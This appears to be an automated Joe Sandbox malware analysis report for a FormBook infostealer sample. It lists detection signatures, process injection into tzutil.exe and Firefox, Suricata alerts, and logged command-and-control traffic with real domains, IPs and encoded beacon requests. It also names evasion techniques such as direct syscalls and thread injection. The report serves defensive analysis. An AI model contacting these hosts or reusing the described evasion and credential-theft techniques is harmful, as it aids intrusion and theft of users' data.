Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0Wu31IhwGO.exe

Overview

General Information

Sample name:0Wu31IhwGO.exe
renamed because original name is a hash value
Original sample name:e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3.exe
Analysis ID:1588148
MD5:92af2b53955341af234b93ff7a4de5c6
SHA1:01b41afef6a77f9710aafe75bc5ef86dc50a3e8b
SHA256:e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0Wu31IhwGO.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\0Wu31IhwGO.exe" MD5: 92AF2B53955341AF234B93FF7A4DE5C6)
    • 0Wu31IhwGO.exe (PID: 8184 cmdline: "C:\Users\user\Desktop\0Wu31IhwGO.exe" MD5: 92AF2B53955341AF234B93FF7A4DE5C6)
      • EPnOHZVVNotZ.exe (PID: 5660 cmdline: "C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 3080 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • EPnOHZVVNotZ.exe (PID: 5420 cmdline: "C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6236 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.0Wu31IhwGO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.0Wu31IhwGO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T22:05:23.195867+010020507451Malware Command and Control Activity Detected192.168.2.1149717161.97.142.14480TCP
                2025-01-10T22:05:47.835328+010020507451Malware Command and Control Activity Detected192.168.2.1149721107.155.56.3080TCP
                2025-01-10T22:06:02.464946+010020507451Malware Command and Control Activity Detected192.168.2.114972518.139.62.22680TCP
                2025-01-10T22:06:23.881170+010020507451Malware Command and Control Activity Detected192.168.2.1149729209.74.77.10780TCP
                2025-01-10T22:06:38.397632+010020507451Malware Command and Control Activity Detected192.168.2.1149733154.205.156.2680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T22:05:23.195867+010028554651A Network Trojan was detected192.168.2.1149717161.97.142.14480TCP
                2025-01-10T22:05:47.835328+010028554651A Network Trojan was detected192.168.2.1149721107.155.56.3080TCP
                2025-01-10T22:06:02.464946+010028554651A Network Trojan was detected192.168.2.114972518.139.62.22680TCP
                2025-01-10T22:06:23.881170+010028554651A Network Trojan was detected192.168.2.1149729209.74.77.10780TCP
                2025-01-10T22:06:38.397632+010028554651A Network Trojan was detected192.168.2.1149733154.205.156.2680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T22:05:40.031039+010028554641A Network Trojan was detected192.168.2.1149718107.155.56.3080TCP
                2025-01-10T22:05:42.564699+010028554641A Network Trojan was detected192.168.2.1149719107.155.56.3080TCP
                2025-01-10T22:05:45.117302+010028554641A Network Trojan was detected192.168.2.1149720107.155.56.3080TCP
                2025-01-10T22:05:54.441084+010028554641A Network Trojan was detected192.168.2.114972218.139.62.22680TCP
                2025-01-10T22:05:56.994740+010028554641A Network Trojan was detected192.168.2.114972318.139.62.22680TCP
                2025-01-10T22:05:59.836770+010028554641A Network Trojan was detected192.168.2.114972418.139.62.22680TCP
                2025-01-10T22:06:16.294566+010028554641A Network Trojan was detected192.168.2.1149726209.74.77.10780TCP
                2025-01-10T22:06:18.786010+010028554641A Network Trojan was detected192.168.2.1149727209.74.77.10780TCP
                2025-01-10T22:06:21.321304+010028554641A Network Trojan was detected192.168.2.1149728209.74.77.10780TCP
                2025-01-10T22:06:30.558773+010028554641A Network Trojan was detected192.168.2.1149730154.205.156.2680TCP
                2025-01-10T22:06:33.246935+010028554641A Network Trojan was detected192.168.2.1149731154.205.156.2680TCP
                2025-01-10T22:06:35.902236+010028554641A Network Trojan was detected192.168.2.1149732154.205.156.2680TCP
                2025-01-10T22:06:43.968585+010028554641A Network Trojan was detected192.168.2.11497343.33.130.19080TCP
                2025-01-10T22:06:46.874309+010028554641A Network Trojan was detected192.168.2.11497353.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jhAvira URL Cloud: Label: malware
                Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                Source: https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: 0Wu31IhwGO.exeReversingLabs: Detection: 73%
                Source: 0Wu31IhwGO.exeVirustotal: Detection: 76%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 0Wu31IhwGO.exeJoe Sandbox ML: detected
                Source: 0Wu31IhwGO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0Wu31IhwGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EPnOHZVVNotZ.exe, 00000007.00000000.2235052111.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3282425393.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 0Wu31IhwGO.exe, 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026AC9D0 FindFirstFileW,FindNextFileW,FindClose,8_2_026AC9D0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax8_2_02699F80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h8_2_02D504D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49722 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49723 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49734 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49726 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49730 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49718 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49735 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49729 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49729 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49725 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49725 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49717 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49717 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49720 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49731 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49721 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49733 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49721 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49728 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49727 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49719 -> 107.155.56.30:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49733 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49732 -> 154.205.156.26:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49724 -> 18.139.62.226:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.070001325.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 21:06:32 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Fri, 10 Jan 2025 21:06:35 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: GET /gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2gcl/?gtL8P=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a6qk/?FZg8n=jDOt606X1jh&gtL8P=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsZd1kcaOBiz2wX9gnM6j3y9U4T6bwB9wKCO8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.learnwithus.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jijievo.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.likesharecomment.net
                Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 67 74 4c 38 50 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 30 79 5a 51 32 6d 6f 59 64 42 36 4a 46 6c 74 36 53 58 77 77 54 30 6a 71 78 63 63 32 4a 74 6e 51 3d 3d Data Ascii: gtL8P=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 21:05:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
